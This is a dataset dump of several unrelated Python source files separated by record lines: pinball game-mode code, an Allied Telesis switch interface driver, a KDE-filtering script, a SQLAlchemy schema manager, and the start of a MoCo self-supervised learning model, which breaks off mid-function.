    combined = dmd.GroupedLayer(128,32,[self.layer,wordsLayer,beerLayer])
    self.cancel_delayed("Display")
    self.layer = combined
    self.game.sound.play(self.game.assets.sfx_slide)
    # 5th jackpot gets special music unless gold mine multiball is also running
    if self.jackpot_count == 5 and not self.game.gm_multiball.running:
        self.music_on(self.game.assets.music_fireball)
    else:
        self.game.base.play_quote(self.game.assets.quote_drunkJackpot)
    self.delay(name="Display",delay=1.5,handler=self.jackpot_score)
def jackpot_score(self):
    """Show the points earned for the last jackpot, then resume the status loop."""
    self.game.sound.play(self.game.assets.sfx_orchestraSpike)
    scoreString = str(ep.format_score(self.jackpotEarned))
    scoreLine = ep.EP_TextLayer(64, 8, self.game.assets.font_15px_az_outline, "center", opaque=False)
    scoreLine.composite_op = "blacksrc"
    scoreLine.set_text(scoreString,color=ep.YELLOW)
    # final frame of the jackpot animation as the backdrop
    backdrop = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_dmbJackpot.frames[17])
    combined = dmd.GroupedLayer(128,32,[backdrop,scoreLine])
    self.layer = combined
    self.delay(name="Display",delay=1,handler=self.update_display)
def end_save(self):
    """Optionally grant a short single-ball save as multiball ends, then tear down."""
    # a ball saver to allow for reacclimation (operator-configurable)
    if self.game.user_settings['Gameplay (Feature)']['Drunk Multiball End Saver'] == 'Enabled':
        self.game.trough.start_ball_save(num_balls_to_save=1, time=8, now=True, allow_multiple_saves=False)
    self.end_drunk()
def end_drunk(self):
    """Tear down drunk multiball: restore flippers/lamps/music, reset tracking and unload."""
    #print "ENDING DRUNK MULTIBALL"
    self.running = False
    self.wipe_delays()
    self.clear_layer()
    # turn off the beer mug
    self.game.lamps.beerMug.disable()
    # update the tracking - mode can be started again
    self.game.set_tracking('drunkMultiballStatus', "OPEN")
    # reset the flippers (mode plays with them reversed)
    self.game.enable_inverted_flippers(False)
    self.game.enable_flippers(True)
    # reset the lamps
    self.lamp_update()
    # clear the layer
    self.layer = None
    # turn the GI back on
    self.game.gi_control("ON")
    # reset the mug hits for next time
    self.game.set_tracking('beerMugHits',0)
    # set the stack flag back off
    self.game.stack_level(3,False)
    # kill the music
    #self.stop_music(slice=4)
    # restat the main music - if balls still in play
    #if self.game.trough.num_balls_in_play > 0:
    self.music_on(self.game.assets.music_mainTheme,mySlice=4)
    # tick up the shots needed for next time
    self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
    # remove the switch blocker
    self.game.switch_blocker('remove',self.myID)
    self.game.base.busy = False
    self.game.base.queued -= 1
    # unload the mode
    self.unload()
def tilted(self):
    """Tilt handler: book-keep the mode ending without awards or effects."""
    if self.running:
        # update the tracking - mode can be started again
        self.game.set_tracking('drunkMultiballStatus', "OPEN")
        # reset the mug hits for next time
        self.game.set_tracking('beerMugHits',0)
        # tick up the shots needed for next time
        self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
    self.running = False
    self.unload()
| StarcoderdataPython |
84741 | # -*- coding: utf-8 -*-
import re
import json
from pprint import pformat
from pynetworking.Feature import Feature
try:
from collections import OrderedDict
except ImportError: # pragma: no cover
from ordereddict import OrderedDict
class ats_interface(Feature):
    """
    Interface feature implementation for ATS
    (Allied Telesis AT-8000S family, driven through its CLI).

    Interface names are normalized to "<stack>.0.<port>"; on the /24 and /48
    models the gigabit ('g') ports are renumbered to follow the fast-ethernet
    ('e') ports (e.g. g1 on an AT-8000S/24 becomes port 25).
    """
    def __init__(self, device, **kvargs):
        Feature.__init__(self, device, **kvargs)
        # static settings parsed from "show interfaces configuration"
        self._interface_config = {}
        # live status merged with config (rebuilt by _update_interface)
        self._interface = {}

    def load_config(self, config):
        """Populate self._interface_config from the device's CLI output."""
        self._device.log_info("load_config")
        self._device.log_debug("Loading config for ats_interface {0}".format(config))
        self._interface_config = OrderedDict()
        # sample row:
        # 1/e1      100M-Copper      Full    100   Enabled  Off  Up          Disabled  Auto
        ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
                          '(?P<type>[^\s]+)\s+'
                          '(?P<configured_duplex>[^\s]+)\s+'
                          '(?P<configured_speed>[^\s]+)\s+'
                          '(?P<negotiation>[^\s]+)\s+'
                          '(?P<flow_control>[^\s]+)\s+'
                          '(?P<enable>(Up|Down))\s+'
                          '(?P<back_pressure>[^\s]+)\s+'
                          '(?P<configured_polarity>[^\s]+)\s+')
        for line in self._device.cmd("show interfaces configuration").split('\n'):
            m = ifre.match(line)
            if m:
                # '--' means no configured speed; skip the port entirely
                if m.group('configured_speed') == '--':
                    continue
                ifn = int(m.group('ifn'))
                # renumber gigabit ports after the fast-ethernet block
                if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
                    ifn += 24
                elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
                    ifn += 48
                ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
                if m.group('enable') == 'Up':
                    enable = True
                else:
                    enable = False
                self._interface_config[ifn] = {'enable': enable,
                                               'configured_speed': m.group('configured_speed'),
                                               'configured_duplex': m.group('configured_duplex').lower(),
                                               'configured_polarity': m.group('configured_polarity').lower(),
                                               }
        # second pass: pick up port descriptions
        ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
                          '(?P<description>[ \w\_]+)')
        for line in self._device.cmd("show interfaces description").split('\n'):
            m = ifre.match(line)
            if m and m.group('description') != '':
                # self._device.log_debug("description for {0} is '{1}'".format(ifn, m.group('description')))
                ifn = int(m.group('ifn'))
                if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
                    ifn += 24
                elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
                    ifn += 48
                ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
                if ifn in self._interface_config:
                    self._interface_config[ifn]['description'] = m.group('description')
        self._device.log_debug("Configuration {0}".format(pformat(json.dumps(self._interface_config))))

    def update(self, ifn, **kwargs):
        """Push configuration changes to one interface (only 'description' is supported).

        Raises:
            ValueError: if ifn is not a known interface.
        """
        self._device.log_info("update {0} {1}".format(ifn, pformat(kwargs)))
        self._update_interface()
        if ifn not in self._interface.keys():
            raise ValueError('interface {0} does not exist'.format(ifn))
        # enter the per-interface configuration context on the device
        cmds = {'cmds': [{'cmd': 'conf', 'prompt': '\(config\)\#'},
                         {'cmd': 'interface ethernet ' + self._to_ifn_native(ifn), 'prompt': '\(config-if\)\#'},
                         ]}
        run_cmd = False
        if 'description' in kwargs:
            description = kwargs['description']
            # the CLI requires quoting when the description contains spaces
            if ' ' in description:
                description = '"{0}"'.format(description)
            # no-op if the description is already set to this value
            if 'description' in self._interface[ifn] and self._interface[ifn]['description'] == description:
                return
            run_cmd = True
            cmds['cmds'].append({'cmd': 'description {0}'.format(description), 'prompt': '\(config-if\)\#'})
        if run_cmd:
            # chr(26) (Ctrl-Z) exits configuration mode
            cmds['cmds'].append({'cmd': chr(26), 'prompt': '\#'})
            self._device.cmd(cmds, cache=False, flush_cache=True)
            self._device.load_system()

    def items(self):
        """dict-style items() over the freshly refreshed interface table."""
        self._update_interface()
        return self._interface.items()

    def keys(self):
        """dict-style keys() over the freshly refreshed interface table."""
        self._update_interface()
        return self._interface.keys()

    def __str__(self):
        self._update_interface()
        return json.dumps(self._interface)

    __repr__ = __str__  # pragma: no cover

    def __getitem__(self, ifn):
        # only string (normalized) interface names are accepted
        if isinstance(ifn, str):
            self._update_interface()
            if ifn in self._interface:
                return self._interface[ifn]
            raise KeyError('interface {0} does not exist'.format(ifn))
        else:
            raise TypeError("invalid argument type")

    def __iter__(self):
        self._update_interface()
        for interface in self._interface:
            yield interface

    def _update_interface(self):
        """Rebuild self._interface from "show interfaces status", merging in the static config."""
        self._device.log_info("_update_interface")
        self._interface = OrderedDict()
        # sample row:
        # 1/e1      100M-Copper    Full    100    Enabled  Off  Up          Disabled     Off
        ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
                          '(?P<type>[^\s]+)\s+'
                          '(?P<current_duplex>[^\s]+)\s+'
                          '(?P<current_speed>[^\s]+)\s+'
                          '(?P<negotiation>[^\s]+)\s+'
                          '(?P<flow_control>[^\s]+)\s+'
                          '(?P<link>(Up|Down))\s+'
                          '(?P<current_polarity>[^\s]+)\s+'
                          '[^\n]+')
        for line in self._device.cmd("show interfaces status").split('\n'):
            m = ifre.match(line)
            if m:
                ifn = int(m.group('ifn'))
                # same gigabit-port renumbering as load_config
                if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
                    ifn += 24
                elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
                    ifn += 48
                ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
                if m.group('link') == 'Up':
                    # polarity 'Off' is reported as mdi, anything else as mdix
                    if m.group('current_polarity') == 'Off':
                        self._interface[ifn] = {'link': True,
                                                'current_speed': m.group('current_speed'),
                                                'current_duplex': m.group('current_duplex').lower(),
                                                'current_polarity': 'mdi'
                                                }
                    else:
                        # NOTE(review): link is 'Up' in this branch but it stores
                        # link: False -- looks like a copy/paste bug; confirm
                        # intended behavior before changing.
                        self._interface[ifn] = {'link': False,
                                                'current_speed': m.group('current_speed'),
                                                'current_duplex': m.group('current_duplex').lower(),
                                                'current_polarity': 'mdix'
                                                }
                else:
                    self._interface[ifn] = {'link': False}
                # merge the static configuration into the status record
                # (dict items concatenation: Python 2 only)
                self._interface[ifn] = dict(self._interface[ifn].items() + self._interface_config[ifn].items())
        self._device.log_debug("Status {0}".format(pformat(json.dumps(self._interface))))

    def _to_ifn_native(self, ifn):
        """Convert a normalized "<stack>.0.<port>" name back to the CLI form "<stack>/e<N>" or "<stack>/g<N>"."""
        self._device.log_info("_to_ifn_native " + ifn)
        stack_no = ifn.split('.')[0]
        if_no = int(ifn.split('.')[2])
        # ports above the fast-ethernet count map back to gigabit ('g') ports
        if self._device.facts['model'] == 'AT-8000S/24' and if_no > 24:
            return "{0}/g{1}".format(stack_no, if_no - 24)
        elif self._device.facts['model'] == 'AT-8000S/48' and if_no > 48:
            return "{0}/g{1}".format(stack_no, if_no - 48)
        else:
            return "{0}/e{1}".format(stack_no, if_no)
| StarcoderdataPython |
1603144 | #!/usr/bin/env python
"""
KDE_parse: parse out KDEs for certain taxa
Usage:
KDE_parse [options] <kde> <taxa>
KDE_parse -h | --help
KDE_parse --version
Options:
<kde> Pickled KDE object.
('-' if input from STDIN)
<taxa> List of taxa used for parsing (one name per line).
Anything following a <tab> will be ignored.
-h --help Show this screen.
--version Show version.
--debug Debug mode
Description:
Sample values from each KDE in the pickled KDE object
and produce a table of values.
Output
------
Tab-delim file: <taxon><tab><value>
"""
# import
## batteries
from docopt import docopt
import sys,os
## 3rd party
import pandas as pd
import dill
## application libraries
from SIPSim import Utils
def load_taxa(inFile):
    """Load taxon names from a file (one name per line).

    Anything following the first <tab> on a line is ignored.

    Args:
        inFile: path to the taxon list file.

    Returns:
        list of taxon-name strings, in file order.
    """
    taxa = []
    # Open in text mode: names are later compared against string keys, and
    # binary mode ('rb') breaks str-based splitting under Python 3.
    with open(inFile) as inFH:
        for line in inFH:
            line = line.rstrip().split('\t')
            taxa.append(line[0])
    return taxa
    # BUGFIX: removed an unreachable trailing "return kde_type" that
    # referenced an undefined name (copy/paste leftover from main()).
def main(args=None):
    """Filter the pickled KDE object down to the listed taxa and write the
    filtered, pickled object to STDOUT.

    Args:
        args: parsed docopt arguments containing '<kde>' and '<taxa>'.

    Raises:
        TypeError: if the KDE object type is not recognized.
    """
    # loading taxa names
    taxa = load_taxa(args['<taxa>'])
    # loading KDEs
    KDEs = Utils.load_kde(args['<kde>'])
    # determine the KDE container structure (list, dict, nested dict, or
    # dict of per-library pickle file paths)
    kde_type = Utils.KDE_type(KDEs)
    # parsing KDE
    if kde_type == 1:
        KDEs_p = [[t,k] for t,k in KDEs if t in taxa]
    elif kde_type == 2:
        KDEs_p = {t:k for t,k in KDEs.items() if t in taxa}
    elif kde_type == 3:
        KDEs_p = {}
        # BUGFIX: iterate the source object (KDEs); the original iterated the
        # just-emptied result dict (KDEs_p), so type-3 objects always came
        # out empty.
        for libID,v in KDEs.items():
            KDEs_pp = {t:k for t,k in v.items() if t in taxa}
            KDEs_p[libID] = KDEs_pp
        KDEs_pp = None
    elif kde_type == 4:
        KDEs_p = {}
        for libID,filename in KDEs.items():
            KDE_bylib = Utils.load_kde(filename)
            KDE_bylib = {t:k for t,k in KDE_bylib.items() if t in taxa}
            KDEs_p[libID] = KDE_bylib
        KDE_bylib = None
    else:
        # call-style raise: the old "raise TypeError, msg" form is a
        # SyntaxError on Python 3 (this form works on both 2 and 3)
        raise TypeError('KDE object type not recognized')
    # writing the filtered (pickled) KDE object to STDOUT
    dill.dump(KDEs_p, sys.stdout)
def opt_parse(args=None):
    """Parse command-line options with docopt and dispatch to main().

    Args:
        args: optional explicit argv list; when None, docopt reads sys.argv.
    """
    kwargs = {} if args is None else {'argv': args}
    parsed = docopt(__doc__, version='0.1', **kwargs)
    main(parsed)
| StarcoderdataPython |
1719956 | from threading import Lock
from mesh.standard import OperationError, ValidationError
from scheme import Boolean, Text
from scheme.supplemental import ObjectReference
from sqlalchemy import MetaData, Table, create_engine, event
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm.session import Session, sessionmaker
from spire.core import *
from spire.local import ContextLocals
from spire.schema.dialect import get_dialect
from spire.schema.migration import MigrationInterface
from spire.util import get_package_path
__all__ = ('OperationError', 'Schema', 'SchemaDependency', 'SchemaInterface', 'ValidationError')

# per-context storage for sessions, keyed under the 'schema.session' prefix
SessionLocals = ContextLocals.create_prefixed_proxy('schema.session')
class EnhancedSession(Session):
    """SQLAlchemy Session that can queue callbacks to run after a commit.

    Callbacks registered via call_after_commit() are collected per
    transaction frame (one frame per begin_nested() plus one for the
    enclosing transaction, stacked on self._call_after_commit) and fire
    only when their frame commits; a rollback discards them.
    """
    def call_after_commit(self, function, *args, **params):
        """Register function(*args, **params) to run after the innermost open frame commits."""
        try:
            nested_calls = self._call_after_commit[-1]
        except (AttributeError, IndexError):
            # no frame stack yet (or it is empty): start one with this callback
            self._call_after_commit = [[(function, args, params)]]
        else:
            nested_calls.append((function, args, params))
    def close(self):
        super(EnhancedSession, self).close()
        # drop any pending callbacks along with the session state
        try:
            del self._call_after_commit
        except AttributeError:
            pass
    def begin_nested(self):
        try:
            calls = self._call_after_commit
        except AttributeError:
            # seed two frames: one for the enclosing transaction plus one
            # for the nested transaction being opened now
            calls = self._call_after_commit = [[], []]
        else:
            calls.append([])
        return super(EnhancedSession, self).begin_nested()
    def commit(self):
        super(EnhancedSession, self).commit()
        # run the callbacks belonging to the frame that just committed
        try:
            nested_calls = self._call_after_commit.pop()
        except (AttributeError, IndexError):
            return
        for function, args, params in nested_calls:
            function(*args, **params)
    def rollback(self):
        super(EnhancedSession, self).rollback()
        # discard the rolled-back frame's callbacks without running them
        try:
            self._call_after_commit.pop()
        except (AttributeError, IndexError):
            pass
class Schema(object):
    """A spire schema.

    Instances are interned by name under a class-level lock: constructing
    Schema('x') twice yields the same object. First construction also
    registers a SchemaDependency and a context-local session slot.
    """
    guard = Lock()   # protects the shared schemas registry
    schemas = {}     # name -> interned Schema instance
    def __new__(cls, name):
        cls.guard.acquire()
        try:
            try:
                return cls.schemas[name]
            except KeyError:
                instance = cls.schemas[name] = super(Schema, cls).__new__(cls)
                instance.constructors = []      # functions run at deploy time
                instance.name = name
                instance.metadata = MetaData()  # SQLAlchemy table registry
                SchemaDependency.register(name)
                SessionLocals.declare(name)
                return instance
        finally:
            cls.guard.release()
    def constructor(self):
        """Decorator: register a function to run (with a session) when the schema is deployed."""
        def decorator(function):
            self.constructors.append(function)
            return function
        return decorator
    @classmethod
    def interface(cls, name):
        """Return the SchemaInterface unit bound to the named schema."""
        return SchemaDependency(name).get()
class SchemaInterface(Unit):
    """Unit that manages engines, sessions and DDL for one Schema.

    Engines/sessionmakers are cached per interpolated URL; database and
    table lifecycle operations (create/deploy/drop) are delegated to the
    configured dialect and optional migration interface.
    """
    configuration = Configuration({
        'admin_url': Text(nonnull=True),
        'echo': Boolean(default=False),
        'hstore': Boolean(default=False),
        'migrations': Text(nonnull=True),
        'schema': Text(nonempty=True),
        'url': Text(nonempty=True),
    })

    def __init__(self, schema, url):
        # schema may be passed by name; resolve to the interned Schema
        if isinstance(schema, basestring):
            schema = Schema.schemas[schema]

        params = {'hstore': self.configuration.get('hstore', False)}
        self.dialect = get_dialect(url, **params)

        self.cache = {}        # url -> (engine, sessionmaker)
        self.guard = Lock()    # protects self.cache
        self.schema = schema
        self.url = url

    @property
    def session(self):
        # convenience accessor for the context-local session
        return self.get_session()

    def construct_model(self, base, tablename, attributes, title=None, **params):
        """Dynamically build an ORM model class bound to this schema/table."""
        params.update(schema=self.schema, tablename=tablename)
        meta = type('meta', (), params)

        attributes.update(meta=meta)
        return type(str(title or tablename), (base,), attributes)

    def create_or_update_table(self, table, **tokens):
        """Create the table if missing, else ALTER it to match the declaration."""
        engine = self.get_engine(**tokens)
        try:
            additions, removals = self._collate_column_changes(engine, table)
            if not additions and not removals:
                return
        except NoSuchTableError:
            table.create(engine)
            return

        sql = self.dialect.construct_alter_table(table.name, additions, removals)
        engine.execute(sql)

    def create_schema(self, **tokens):
        """Create the database (via admin_url), all tables, and stamp migrations."""
        url = self._construct_url(tokens)
        name = url.split('/')[-1]

        admin_url = self.configuration.get('admin_url')
        self.dialect.create_database(admin_url, name)

        engine, sessions = self._acquire_engine(tokens)
        self.schema.metadata.create_all(engine)

        migrations = self._get_migration_interface()
        if migrations and migrations.has_revisions:
            migrations.stamp()

    def deploy_schema(self, **tokens):
        """Upgrade an existing database (or create a new one), then run registered constructors."""
        url = self._construct_url(tokens)
        name = url.split('/')[-1]

        admin_url = self.configuration.get('admin_url')
        if self.dialect.is_database_present(admin_url, name):
            migrations = self._get_migration_interface()
            if migrations and migrations.has_revisions:
                migrations.upgrade()
        else:
            self.create_schema(**tokens)

        constructors = self.schema.constructors
        if not constructors:
            return

        engine, sessions = self._acquire_engine(tokens)
        session = sessions()
        try:
            for constructor in constructors:
                constructor(session)
        finally:
            session.close()

    def drop_schema(self, **tokens):
        """Drop the whole database (no-op when no admin_url is configured)."""
        url = self._construct_url(tokens)
        name = url.split('/')[-1]

        admin_url = self.configuration.get('admin_url')
        if admin_url:
            self.dialect.drop_database(admin_url, name)

    def drop_table(self, table, **tokens):
        """Drop a single table."""
        engine, sessions = self._acquire_engine(tokens)
        table.drop(engine)

    def drop_tables(self, **tokens):
        """Drop every table registered on this schema's metadata."""
        engine, sessions = self._acquire_engine(tokens)
        self.schema.metadata.drop_all(engine)

    def enumerate_tables(self, **tokens):
        """Return the table names actually present in the database."""
        engine, sessions = self._acquire_engine(tokens)
        inspector = Inspector.from_engine(engine)
        return inspector.get_table_names()

    def get_engine(self, **tokens):
        engine, sessions = self._acquire_engine(tokens)
        return engine

    def get_session(self, independent=False, **tokens):
        """Return a session.

        When independent is False (default) the session is shared via the
        context-local registry and closed when the context pops.
        """
        if independent:
            engine, sessions = self._acquire_engine(tokens)
            return sessions()

        session = SessionLocals.get(self.schema.name)
        if session:
            return session

        engine, sessions = self._acquire_engine(tokens)
        session = sessions()
        return SessionLocals.push(self.schema.name, session, session.close)

    def is_table_correct(self, table, **tokens):
        """True if the live table exists and needs no column additions or removals."""
        engine = self.get_engine(**tokens)
        try:
            additions, removals = self._collate_column_changes(engine, table)
            return (not additions and not removals)
        except NoSuchTableError:
            return False

    def lock_tables(self, session, tables, mode='share row exclusive'):
        """Issue a LOCK TABLE statement for each named table within the session."""
        if isinstance(tables, basestring):
            tables = [tables]
        for tablename in tables:
            session.execute(self.dialect.construct_lock_table(tablename, mode))

    def purge(self):
        """Dispose every cached engine and empty the cache."""
        self.guard.acquire()
        try:
            for engine, sessions in self.cache.itervalues():
                engine.dispose()
            self.cache = {}
        finally:
            self.guard.release()

    def table_exists(self, table, **tokens):
        engine, sessions = self._acquire_engine(tokens)
        return table.exists(engine)

    def _acquire_engine(self, tokens=None):
        """Return (engine, sessionmaker) for the interpolated url.

        Uses double-checked locking on self.cache so engines are built once.
        """
        url = self._construct_url(tokens)
        try:
            return self.cache[url]
        except KeyError:
            pass

        self.guard.acquire()
        try:
            if url in self.cache:
                return self.cache[url]

            engine, sessions = self._create_engine(url)
            self.cache[url] = (engine, sessions)
            return engine, sessions
        finally:
            self.guard.release()

    def _collate_column_changes(self, engine, table):
        """Diff the declared table against the live one.

        Returns:
            (additions, removals). additions is a list of Column objects to
            add; removals mixes Column objects (type changed: drop + re-add)
            and plain column-name strings (column no longer declared).
        """
        inspector = Inspector.from_engine(engine)
        columns = {}
        for column in Inspector.from_engine(engine).get_columns(table.name):
            columns[column['name']] = column

        additions = []
        removals = []

        for column in table.columns:
            existing = columns.get(column.name)
            if existing is not None:
                if self.dialect.type_is_equivalent(column.type, existing['type']):
                    continue
                else:
                    # type changed: schedule a drop, then fall through to re-add
                    removals.append(column)
            additions.append(column)

        for name in columns:
            if name not in table.columns:
                removals.append(name)

        return additions, removals

    def _construct_url(self, tokens=None):
        # interpolate %-style tokens (e.g. per-tenant names) into the url
        url = self.url
        if tokens:
            url = url % tokens
        return url

    def _create_engine(self, url):
        echo = self.configuration.get('echo')
        if echo:
            # SQLAlchemy's most verbose logging level
            echo = 'debug'

        engine = self.dialect.create_engine(url, self.schema, echo=echo)
        return engine, sessionmaker(bind=engine, class_=EnhancedSession)

    def _get_migration_interface(self):
        """Return a MigrationInterface when migrations are configured, else None."""
        migrations = self.configuration.get('migrations')
        if migrations:
            return MigrationInterface(self.schema, get_package_path(migrations))
class SchemaDependency(Dependency):
    """Dependency declaration that resolves to the SchemaInterface unit of a named schema."""
    def __init__(self, schema, **params):
        self.schema = schema
        token = 'schema:%s' % schema
        super(SchemaDependency, self).__init__(SchemaInterface, token, **params)

    def contribute_params(self):
        """Supply the schema name to the resolved SchemaInterface's configuration."""
        return dict(schema=self.schema)
| StarcoderdataPython |
3270455 | <gh_stars>0
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.distributed as dist
from openselfsup.utils import print_log
from . import builder
from .registry import MODELS
from openselfsup.datasets import viz_utils
import random
import wandb
# TODO(cjrd) use this across all classes?
# One-shot guard so a sample image pair is only logged to wandb once per run;
# referenced only by the commented-out block in BaseModel.train_step.
train_images_sent_to_wandb = False
class BaseModel(nn.Module):
    """Base class for self-supervised models.

    Subclasses implement ``forward``; this class packages the loss dict that
    ``forward`` returns into the ``{'loss', 'log_vars', 'num_samples'}``
    outputs dict expected by the runner, and reduces losses across
    distributed workers.
    """

    def __init__(self):
        super(BaseModel, self).__init__()
        self.debug = False

    def set_debug(self):
        """Enable debug mode (lets subclasses skip distributed-only code paths)."""
        self.debug = True

    def _run_step(self, data):
        """Run a forward pass and package the result for the runner.

        Shared implementation of train_step/eval_step/val, which previously
        triplicated this logic.

        Args:
            data (dict): batch dict; single-view batches carry 'img', two-view
                (MoCo-style) batches carry 'img_q'/'img_k' DataContainers.

        Returns:
            dict with 'loss' (Tensor), 'log_vars' (dict) and 'num_samples' (int).
        """
        losses = self(**data)
        loss, log_vars = self._parse_losses(losses)
        # batch size: count the single view, or the query view for paired input
        if 'img' in data:
            nimg = len(data['img'].data)
        else:
            nimg = len(data['img_q'].data)
        return dict(loss=loss, log_vars=log_vars, num_samples=nimg)

    def train_step(self, data, optimizer, **kwargs):
        """One training step; ``optimizer`` is unused here (the runner steps it)."""
        # NOTE: a commented-out snippet used to live here that logged one random
        # (img_q, img_k) pair per run to wandb via viz_utils.read_msi_as_plt,
        # guarded by the module-level train_images_sent_to_wandb flag. It was
        # disabled because the tensors at this point match what wandb already
        # shows after the pipeline.
        return self._run_step(data)

    def eval_step(self, data, optimizer, **kwargs):
        """One evaluation step (same packaging as train_step)."""
        return self._run_step(data)

    def val(self, data, optimizer, **kwargs):
        """Validation step; identical to eval_step, kept for API compatibility."""
        return self._run_step(data)

    def _parse_losses(self, losses):
        """Parse the raw outputs (losses) of the network.

        Args:
            losses (dict): Raw output of the network, which usually contain
                losses and other necessary infomation.

        Returns:
            tuple[Tensor, dict]: (loss, log_vars), loss is the loss tensor \
                which may be a weighted sum of all losses, log_vars contains \
                all the variables to be sent to the logger.
        """
        log_vars = OrderedDict()
        for loss_name, loss_value in losses.items():
            if isinstance(loss_value, torch.Tensor):
                log_vars[loss_name] = loss_value.mean()
            elif isinstance(loss_value, list):
                log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
            else:
                raise TypeError(
                    f'{loss_name} is not a tensor or list of tensors')

        # total loss is the sum of every entry whose key contains 'loss'
        loss = sum(_value for _key, _value in log_vars.items()
                   if 'loss' in _key)

        log_vars['loss'] = loss
        for loss_name, loss_value in log_vars.items():
            # reduce loss when distributed training
            if dist.is_available() and dist.is_initialized():
                loss_value = loss_value.data.clone()
                dist.all_reduce(loss_value.div_(dist.get_world_size()))
            log_vars[loss_name] = loss_value.item()

        return loss, log_vars
@MODELS.register_module
class MOCO(BaseModel):
"""MOCO.
Implementation of "Momentum Contrast for Unsupervised Visual
Representation Learning (https://arxiv.org/abs/1911.05722)".
Part of the code is borrowed from:
"https://github.com/facebookresearch/moco/blob/master/moco/builder.py".
Args:
backbone (dict): Config dict for module of backbone ConvNet.
neck (dict): Config dict for module of deep features to compact feature vectors.
Default: None.
head (dict): Config dict for module of loss functions. Default: None.
pretrained (str, optional): Path to pre-trained weights. Default: None.
queue_len (int): Number of negative keys maintained in the queue.
Default: 65536.
feat_dim (int): Dimension of compact feature vectors. Default: 128.
momentum (float): Momentum coefficient for the momentum-updated encoder.
Default: 0.999.
"""
def __init__(self,
backbone,
input_module_q=None,
input_module_k=None,
random_swap_q_k=False,
neck=None,
head=None,
pretrained=None,
queue_len=65536,
feat_dim=128,
momentum=0.999,
**kwargs):
super(MOCO, self).__init__()
# Allow for multi-band input
self.input_module_q=builder.build_input_module(input_module_q)
self.input_module_k=builder.build_input_module(input_module_k)
self.random_swap_q_k = random_swap_q_k
self.encoder_q = nn.Sequential(
builder.build_backbone(backbone), builder.build_neck(neck))
self.encoder_k = nn.Sequential(
builder.build_backbone(backbone), builder.build_neck(neck))
self.backbone = self.encoder_q[0]
for param in self.encoder_k.parameters():
param.requires_grad = False
self.head = builder.build_head(head)
self.init_weights(pretrained=pretrained)
self.queue_len = queue_len
self.momentum = momentum
# create the queue
self.register_buffer("queue", torch.randn(feat_dim, queue_len))
self.queue = nn.functional.normalize(self.queue, dim=0)
self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long))
def init_weights(self, pretrained=None):
"""Initialize the weights of model.
Args:
pretrained (str, optional): Path to pre-trained weights.
Default: None.
"""
if pretrained is not None:
print_log('load model from: {}'.format(pretrained), logger='root')
self.encoder_q[0].init_weights(pretrained=pretrained)
self.encoder_q[1].init_weights(init_linear='kaiming')
for param_q, param_k in zip(self.encoder_q.parameters(),
self.encoder_k.parameters()):
param_k.data.copy_(param_q.data)
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""Momentum update of the key encoder."""
for param_q, param_k in zip(self.encoder_q.parameters(),
self.encoder_k.parameters()):
param_k.data = param_k.data * self.momentum + \
param_q.data * (1. - self.momentum)
@torch.no_grad()
def _dequeue_and_enqueue(self, keys):
"""Update queue."""
# gather keys before updating queue
if not self.debug:
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr)
assert self.queue_len % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue[:, ptr:ptr + batch_size] = keys.transpose(0, 1)
ptr = (ptr + batch_size) % self.queue_len # move pointer
self.queue_ptr[0] = ptr
@torch.no_grad()
def _batch_shuffle_ddp(self, x):
"""Batch shuffle, for making use of BatchNorm.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# random shuffle index
idx_shuffle = torch.randperm(batch_size_all).cuda()
# broadcast to all gpus
torch.distributed.broadcast(idx_shuffle, src=0)
# index for restoring
idx_unshuffle = torch.argsort(idx_shuffle)
# shuffled index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this], idx_unshuffle
@torch.no_grad()
def _batch_unshuffle_ddp(self, x, idx_unshuffle):
"""Undo batch shuffle.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# restored index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this]
def forward_train(self, img=None, im_q=None, im_k=None, **kwargs):
"""Forward computation during training.
Args:
img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).
Typically these should be mean centered and std scaled.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
if img is not None:
assert img.dim() == 5, \
"Input must have 5 dims, got: {}".format(img.dim())
if img is not None and im_q is None:
im_q = img[:, 0, ...].contiguous()
if img is not None and im_k is None:
im_k = img[:, 1, ...].contiguous()
# compute query features
if self.input_module_q is not None:
im_q = self.input_module_q(im_q)
if self.input_module_k is not None:
im_k = self.input_module_k(im_k)
# use images from both source in key and query
half_bsz = im_q.shape[0]//2
